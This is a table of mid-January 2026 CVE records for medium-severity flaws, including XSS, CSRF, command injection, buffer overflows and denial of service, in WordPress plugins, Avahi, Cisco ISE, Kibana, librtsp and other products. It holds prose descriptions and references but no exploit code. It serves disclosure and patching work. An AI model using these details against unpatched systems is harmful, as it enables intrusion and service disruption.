| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21303 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| adoncreatives--Testimonials Creator | The Testimonials Creator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in version 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-14379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3af18a17-81a0-4720-b222-153ab4ddf7d9?source=cve https://wordpress.org/plugins/testimonials-creator/ |
| akinloluwami--outray | Outray is an open-source ngrok alternative. Prior to 0.1.5, a lack of database transaction locking in main/apps/web/src/routes/api/$orgSlug/subdomains/index.ts allows a user (e.g. a free-plan user) to obtain more subdomains than intended. This vulnerability is fixed in 0.1.5. | 2026-01-14 | 5.9 | CVE-2026-22819 | https://github.com/outray-tunnel/outray/security/advisories/GHSA-45hj-9x76-wp9g https://github.com/outray-tunnel/outray/commit/73e8a09575754fb4c395438680454b2ec064d1d6 |
| aliasvault--aliasvault | AliasVault is a privacy-first password manager with built-in email aliasing. AliasVault Android versions 0.24.0 through 0.25.2 contained an issue in how passkey requests from Android apps were validated. Under certain local conditions, a malicious app could attempt to obtain a passkey response for a site it was not authorized to access. The issue involved incomplete validation of calling app identity, origin, and RP ID in the Android credential provider. This issue was fixed in AliasVault Android 0.25.3. | 2026-01-14 | 6.1 | CVE-2026-22694 | https://github.com/aliasvault/aliasvault/security/advisories/GHSA-mvg4-wvjv-332q https://github.com/aliasvault/aliasvault/issues/1440 https://github.com/aliasvault/aliasvault/pull/1441 https://github.com/aliasvault/aliasvault/commit/b3350473103d6138ab2b63ca130c211717eac67d https://github.com/aliasvault/aliasvault/releases/tag/0.25.3 |
| Altium--Altium Live | A stored cross-site scripting (XSS) vulnerability exists in the Altium Support Center AddComment endpoint due to missing server-side input sanitization. Although the client interface applies HTML escaping, the backend accepts and stores arbitrary HTML and JavaScript supplied via modified POST requests. The injected content is rendered verbatim when support cases are viewed by other users, including support staff with elevated privileges, allowing execution of arbitrary JavaScript in the victim's browser context. | 2026-01-15 | 6.1 | CVE-2026-1011 | https://www.altium.com/platform/security-compliance/security-advisories |
| AmauriC--tarteaucitron.js | tarteaucitron.js is a compliant and accessible cookie banner. Prior to 1.29.0, a Regular Expression Denial of Service (ReDoS) vulnerability was identified in tarteaucitron.js in the handling of the issuu_id parameter. This vulnerability is fixed in 1.29.0. | 2026-01-13 | 4.4 | CVE-2026-22809 | https://github.com/AmauriC/tarteaucitron.js/security/advisories/GHSA-q5f6-qxm2-mcqm https://github.com/AmauriC/tarteaucitron.js/commit/f0bbdac2fdf3cd24a325fc0928c0d34abf1b7b52 |
| aplazopayment--Aplazo Payment Gateway | The Aplazo Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_success_response() function in all versions up to, and including, 1.4.2. This makes it possible for unauthenticated attackers to set any WooCommerce order to `pending payment` status. | 2026-01-14 | 5.3 | CVE-2025-15512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/97b327cc-7a72-4cc3-a4db-a693469f6917?source=cve https://plugins.trac.wordpress.org/browser/aplazo-payment-gateway/tags/1.4.2/includes/module/class-aplazo-module.php#L206 |
| Arunna--Arunna | Arunna 1.0.0 contains a cross-site request forgery vulnerability that allows attackers to manipulate user profile settings without authentication. Attackers can craft a malicious form to change user details, including passwords, email, and administrative privileges by tricking authenticated users into submitting the form. | 2026-01-15 | 5.3 | CVE-2021-47754 | ExploitDB-50608 Archived Researcher Blog Arunna GitHub Repository |
| Automattic--Jetpack | Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page. | 2026-01-13 | 6.1 | CVE-2023-54332 | ExploitDB-51104 Jetpack WordPress Plugin Homepage VulnCheck Advisory: Jetpack 11.4 - Cross Site Scripting (XSS) |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, avahi-daemon can be crashed by sending unsolicited announcements containing CNAME resource records pointing it to resource records with short TTLs. As soon as they expire avahi-daemon crashes. | 2026-01-12 | 6.5 | CVE-2025-68468 | https://github.com/avahi/avahi/security/advisories/GHSA-cp79-r4x9-vf52 https://github.com/avahi/avahi/issues/683 https://github.com/avahi/avahi/commit/f66be13d7f31a3ef806d226bf8b67240179d309a |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, avahi-daemon can be crashed by sending 2 unsolicited announcements with CNAME resource records 2 seconds apart. | 2026-01-12 | 6.5 | CVE-2025-68471 | https://github.com/avahi/avahi/security/advisories/GHSA-56rf-42xr-qmmg https://github.com/avahi/avahi/issues/678 https://github.com/avahi/avahi/commit/9c6eb53bf2e290aed84b1f207e3ce35c54cc0aa1 |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, unprivileged local users can crash avahi-daemon (with wide-area disabled) by creating record browsers with the AVAHI_LOOKUP_USE_WIDE_AREA flag set via D-Bus. This can be done either by calling the RecordBrowserNew method directly or by creating hostname/address/service resolvers/browsers that create those browsers internally themselves. | 2026-01-12 | 5.5 | CVE-2025-68276 | https://github.com/avahi/avahi/security/advisories/GHSA-mhf3-865v-g5rc https://github.com/avahi/avahi/pull/806 https://github.com/avahi/avahi/commit/ede7048475c5d47d53890e3bc1350dda8e0b3688 |
| Awesome Motive--YouTube Feed Pro | The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.6.0 via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information, granted the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube. | 2026-01-17 | 5.9 | CVE-2025-12002 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f31ec5-c376-45b1-9ffe-35c80b89b60d?source=cve https://smashballoon.com/youtube-feed/ https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1047 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1038 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L25 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L339 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L383 |
| awesomesupport--Awesome Support WordPress HelpDesk & Support Plugin | The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce. | 2026-01-16 | 6.5 | CVE-2025-12641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a8e4ca-c16b-4e9d-8ad2-5a671fdbc49a?source=cve https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L36 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L66 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-user.php#L1686 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/themes/default/registration.php#L183 https://plugins.trac.wordpress.org/changeset/3435609/awesome-support/trunk/includes/functions-user.php?contextall=1 |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Prior to version 1.28.3, Mailpit's SMTP server is vulnerable to Header Injection due to an insufficient Regular Expression used to validate `RCPT TO` and `MAIL FROM` addresses. An attacker can inject arbitrary SMTP headers (or corrupt existing ones) by including carriage return characters (`\r`) in the email address. This header injection occurs because the regex intended to filter control characters fails to exclude `\r` and `\n` when used inside a character class. Version 1.28.3 fixes this issue. | 2026-01-18 | 5.3 | CVE-2026-23829 | https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c https://github.com/axllent/mailpit/commit/36cc06c125954dec6673219dafa084e13cc14534 https://github.com/axllent/mailpit/releases/tag/v1.28.3 |
| B2Evolution--b2evolution | b2evolution 7.2.2 contains a cross-site request forgery vulnerability that allows attackers to modify admin account details without authentication. Attackers can craft a malicious HTML form to submit unauthorized changes to user profiles by tricking victims into loading a specially crafted webpage. | 2026-01-15 | 5.3 | CVE-2021-47800 | ExploitDB-50081 Official Vendor Homepage Software Download Page B2Evolution GitHub Repository VulnCheck Advisory: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) |
| bastillion-io--Bastillion | A vulnerability has been found in bastillion-io Bastillion up to 4.0.1. This vulnerability affects unknown code of the file src/main/java/io/bastillion/manage/control/AuthKeysKtrl.java of the component Public Key Management System. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 4.7 | CVE-2026-1063 | VDB-341631 \| bastillion-io Bastillion Public Key Management System AuthKeysKtrl.java command injection VDB-341631 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731303 \| bastillion-io Bastillion <=4.0.1 Command Injection https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report1.md |
| bastillion-io--Bastillion | A vulnerability was found in bastillion-io Bastillion up to 4.0.1. This issue affects some unknown processing of the file src/main/java/io/bastillion/manage/control/SystemKtrl.java of the component System Management Module. Performing a manipulation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 4.7 | CVE-2026-1064 | VDB-341632 \| bastillion-io Bastillion System Management SystemKtrl.java command injection VDB-341632 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731308 \| bastillion-io Bastillion SSH Key Manager <=4.0.1 Command Injection https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report2.md |
| bdthemes--Spin Wheel Interactive spinning wheel that offers coupons | The Spin Wheel plugin for WordPress is vulnerable to client-side prize manipulation in all versions up to, and including, 2.1.0. This is due to the plugin trusting client-supplied prize selection data without server-side validation or randomization. This makes it possible for unauthenticated attackers to manipulate which prize they win by modifying the 'prize_index' parameter sent to the server, allowing them to always select the most valuable prizes. | 2026-01-17 | 5.3 | CVE-2026-0808 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c023b91e-f633-41a6-b2d7-bcb3f1d026b7?source=cve https://plugins.trac.wordpress.org/browser/spin-wheel/trunk/includes/class-swp-ajax.php#L73 https://plugins.trac.wordpress.org/browser/spin-wheel/tags/2.0.2/includes/class-swp-ajax.php#L73 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437726%40spin-wheel&new=3437726%40spin-wheel&sfp_email=&sfph_mail= |
| BlackBerry Ltd--QNX Software Development Platform | Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel. | 2026-01-13 | 6.2 | CVE-2025-8090 | https://support.blackberry.com/pkb/s/article/141027 |
| bplugins--Team Section Block Showcase Team Members with Layout Options | The Team Section Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user-supplied social network link URLs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 6.4 | CVE-2026-0833 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6348b119-a0dc-40ef-ae62-1de86dcefac7?source=cve https://plugins.trac.wordpress.org/browser/team-section/trunk/build/render.php#L3 https://plugins.trac.wordpress.org/browser/team-section/tags/1.1.0/build/render.php#L3 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436953%40team-section&new=3436953%40team-section&sfp_email=&sfph_mail= |
| brechtvds--WP Recipe Maker | The WP Recipe Maker plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 10.2.2 via the api_get_post_summary function due to insufficient restrictions on which posts can be retrieved. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from posts they may not be able to edit or read otherwise. This also affects password protected, private, or draft posts that they should not have access to. | 2026-01-16 | 4.3 | CVE-2025-15527 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96f77fdc-4e91-43c0-8bc6-7bb202945c7d?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L48 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L86 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L172 https://plugins.trac.wordpress.org/changeset/3415263/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php?contextall=1&old=3402554&old_path=%2Fwp-recipe-maker%2Ftrunk%2Fincludes%2Fpublic%2Fapi%2Fclass-wprm-api-utilities.php |
| BYVoid--OpenCC | A weakness has been identified in BYVoid OpenCC up to 1.1.9. This vulnerability affects the function opencc::MaxMatchSegmentation of the file src/MaxMatchSegmentation.cpp. This manipulation causes a heap-based buffer overflow. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. Patch name: 345c9a50ab07018f1b4439776bad78a0d40778ec. To fix this issue, it is recommended to deploy a patch. | 2026-01-18 | 5.3 | CVE-2025-15536 | VDB-341708 \| BYVoid OpenCC MaxMatchSegmentation.cpp MaxMatchSegmentation heap-based overflow VDB-341708 \| CTI Indicators (IOB, IOC, IOA) Submit #733347 \| BYVoid OpenCC ver.1.1.9 and master-branch Heap-based Buffer Overflow https://github.com/BYVoid/OpenCC/issues/997 https://github.com/BYVoid/OpenCC/pull/1005 https://github.com/oneafter/1222/blob/main/repro https://github.com/BYVoid/OpenCC/commit/345c9a50ab07018f1b4439776bad78a0d40778ec |
| cakephp--cakephp | CakePHP is a rapid development framework for PHP. The PaginatorHelper::limitControl() method has a cross-site-scripting vulnerability via query string parameter manipulation. This issue has been fixed in 5.2.12 and 5.3.1. | 2026-01-16 | 5.4 | CVE-2026-23643 | https://github.com/cakephp/cakephp/security/advisories/GHSA-qh8m-9qxx-53m5 https://github.com/cakephp/cakephp/issues/19172 https://github.com/cakephp/cakephp/commit/c842e7f45d85696e6527d8991dd72f525ced955f https://bakery.cakephp.org/2026/01/14/cakephp_5212.html https://github.com/cakephp/cakephp/releases/tag/5.2.12 https://github.com/cakephp/cakephp/releases/tag/5.3.1 |
| cbutlerjr--WP-Members Membership Plugin | The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Multiple Checkbox and Multiple Select user profile fields in all versions up to, and including, 3.5.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-15 | 5.4 | CVE-2025-14448 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89d1fa00-4757-4f86-bddb-a6a2dbcf9625?source=cve https://plugins.trac.wordpress.org/changeset/3418471/wp-members |
| Celestialsoftware--AbsoluteTelnet | AbsoluteTelnet 11.24 contains a denial of service vulnerability that allows local attackers to crash the application by manipulating DialUp connection and license name fields. Attackers can generate a 1000-character payload and paste it into specific input fields to trigger application crashes and force unexpected termination. | 2026-01-15 | 6.2 | CVE-2021-47764 | ExploitDB-50511 Vendor Homepage |
| Celestialsoftware--AbsoluteTelnet | AbsoluteTelnet 11.24 contains a denial of service vulnerability that allows local attackers to crash the application by manipulating username and error report fields. Attackers can trigger the crash by inserting 1000 characters into the username or email address fields, causing the application to become unresponsive. | 2026-01-15 | 6.2 | CVE-2021-47765 | ExploitDB-50510 Vendor Homepage |
| Chamilo--LMS | A security flaw has been discovered in Chamilo LMS up to 2.0.0 Beta 1. This issue affects the function deleteLegal of the file src/CoreBundle/Controller/SocialController.php of the component Legal Consent Handler. Manipulating the argument userId results in improper authorization. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.4 | CVE-2026-1106 | VDB-341698 \| Chamilo LMS Legal Consent SocialController.php deleteLegal improper authorization VDB-341698 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731510 \| Chamilo LMS <= v2.0.0 Beta 1 SocialController IDOR - Legal Consent Data Manipulat https://note-hxlab.wetolink.com/share/w92t1Q0a74Gj |
| cijliu--librtsp | A security vulnerability has been detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The affected element is the function rtsp_rely_dumps. The manipulation leads to a buffer overflow. The attack must be carried out locally. This product uses rolling releases to provide continuous delivery; therefore, no version details for affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1108 | VDB-341700 \| cijliu librtsp rtsp_rely_dumps buffer overflow VDB-341700 \| CTI Indicators (IOB, IOC, IOA) Submit #732598 \| librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_rely_dumps/librtsp_rtsp_rely_dumps.md |
| cijliu--librtsp | A vulnerability was detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The impacted element is the function rtsp_parse_request. The manipulation results in a buffer overflow. Local access is required to carry out the attack. This product uses rolling releases to provide continuous delivery; therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1109 | VDB-341701 \| cijliu librtsp rtsp_parse_request buffer overflow VDB-341701 \| CTI Indicators (IOB, IOC, IOA) Submit #732599 \| librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_parse_request/librtsp_rtsp_parse_request.md |
| cijliu--librtsp | A flaw has been found in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. This affects the function rtsp_parse_method. This manipulation causes a buffer overflow. The attack can be launched on the local host. This product uses rolling releases to provide continuous delivery; therefore, no version details for affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1110 | VDB-341702 \| cijliu librtsp rtsp_parse_method buffer overflow VDB-341702 \| CTI Indicators (IOB, IOC, IOA) Submit #732603 \| librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_parse_method/librtsp_rtsp_parse_method.md |
| Cinspiration--RDP Manager | RDP Manager 4.9.9.3 contains a denial of service vulnerability in connection input fields that allows local attackers to crash the application. Attackers can add oversized entries in Verbindungsname and Server fields to permanently freeze and crash the software, potentially requiring full reinstallation. | 2026-01-15 | 6.2 | CVE-2021-47771 | ExploitDB-50484 Archived Software Download Page Vulnerability-Lab Disclosure |
| Cisco--Cisco Evolved Programmable Network Manager (EPNM) | A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against users of the interface of an affected system. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious code into specific data fields in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20075 | cisco-sa-epnm-pi-stored-xss-GEkX8yWK |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20047 | cisco-sa-ise-xss-964cdxW5 |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20076 | cisco-sa-ise-xss-9TDh2kx |
| codepeople--CP Image Store with Slideshow | The CP Image Store with Slideshow plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.9 due to a logic error in the 'cpis_admin_init' function's permission check. This makes it possible for authenticated attackers, with Contributor-level access and above, to import arbitrary products via XML, if the XML file has already been uploaded to the server. | 2026-01-13 | 4.3 | CVE-2026-0684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28e48604-2aaf-4e02-9b1e-cebf5f0bfcf7?source=cve https://plugins.trac.wordpress.org/browser/cp-image-store/tags/1.1.9/cp-image-store.php#L826 https://plugins.trac.wordpress.org/changeset/3434716/ |
| ConnectWise--PSA | In ConnectWise PSA versions older than 2026.1, certain session cookies were not set with the HttpOnly attribute. In some scenarios, this could allow client-side scripts access to session cookie values. | 2026-01-16 | 6.5 | CVE-2026-0696 | https://www.connectwise.com/company/trust/security-bulletins/2026-01-15-psa-security-fix |
| creativemindssolutions--CM E-Mail Blacklist Simple email filtering for safer registration | The CM E-Mail Blacklist - Simple email filtering for safer registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'black_email' parameter in all versions up to, and including, 1.6.2. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-17 | 4.4 | CVE-2026-0691 | https://www.wordfence.com/threat-intel/vulnerabilities/id/821f4ea9-bc25-4d65-9058-5b77c4f1b230?source=cve https://plugins.trac.wordpress.org/browser/cm-email-blacklist/trunk/backend/views/settings/email_blacklist.phtml#L67 https://plugins.trac.wordpress.org/browser/cm-email-blacklist/tags/1.6.2/backend/views/settings/email_blacklist.phtml#L67 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440158%40cm-email-blacklist&new=3440158%40cm-email-blacklist&sfp_email=&sfph_mail= |
| crushpics--Crush.pics Image Optimizer Image Compression and Optimization | The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings. | 2026-01-14 | 4.3 | CVE-2025-14482 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e71bf15-aee0-4efc-a1c6-faad9f6e4f38?source=cve https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L66 https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L193 https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L30 |
| cubewp1211--CubeWP Framework | The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 6.4 | CVE-2025-8615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efc2baf0-38d9-44be-b439-3585b2f1d4a5?source=cve https://wordpress.org/plugins/cubewp-framework/#developers https://plugins.trac.wordpress.org/changeset/3362001#file10 |
| cubewp1211--CubeWP Framework | The CubeWP - All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.27 via the /cubewp-posts/v1/query-new and /cubewp-posts/v1/query REST API endpoints due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-01-17 | 5.3 | CVE-2025-12129 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2006dc4c-ec1a-45ab-94a3-1f86d80e70ca?source=cve https://plugins.trac.wordpress.org/changeset/3422640/cubewp-framework/trunk/cube/classes/class-cubewp-rest-api.php |
| cyberlord92--Integrate Dynamics 365 CRM | The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 4.4 | CVE-2026-0725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6b16028a-0b69-422b-9471-32ea6edb93a0?source=cve https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Wrappers/class-templatewrapper.php#L491 https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.1.1/Wrappers/class-templatewrapper.php#L491 https://plugins.trac.wordpress.org/changeset/3438502/ |
| Dell--SupportAssist OS Recovery | Dell SupportAssist OS Recovery, versions prior to 5.5.15.1, contain a Creation of Temporary File With Insecure Permissions vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information Tampering. | 2026-01-13 | 6.6 | CVE-2025-46684 | https://www.dell.com/support/kbdoc/en-us/000401506/dsa-2025-456 |
| dfieldfl--WP Allowed Hosts | The WP Allowed Hosts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allowed-hosts' parameter in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2026-0734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/700e9d1c-a178-4033-8607-652178860211?source=cve https://plugins.trac.wordpress.org/browser/wp-allow-hosts/trunk/allowed-hosts.php#L170 https://plugins.trac.wordpress.org/browser/wp-allow-hosts/tags/1.0.8/allowed-hosts.php#L170 |
| e107--e107 CMS | e107 CMS 3.2.1 contains an upload restriction bypass vulnerability that allows authenticated administrators to upload malicious SVG files through the media manager. Attackers with admin privileges can exploit this vulnerability to upload SVG files with embedded cross-site scripting (XSS) payloads that can execute arbitrary scripts when viewed. | 2026-01-13 | 4.8 | CVE-2022-50906 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Admin Upload Restriction Bypass + Stored XSS |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs. | 2026-01-13 | 6.5 | CVE-2026-0530 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521 |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users. | 2026-01-13 | 6.5 | CVE-2026-0531 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-04/384522 |
| Elastic--Kibana | Improper Input Validation (CWE-20) in Kibana's Email Connector can allow an attacker to cause an Excessive Allocation (CAPEC-130) through a specially crafted email address parameter. This requires an attacker to have authenticated access with view-level privileges sufficient to execute connector actions. The application attempts to process specially crafted email format, resulting in complete service unavailability for all users until manual restart is performed. | 2026-01-13 | 6.5 | CVE-2026-0543 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-08/384523 |
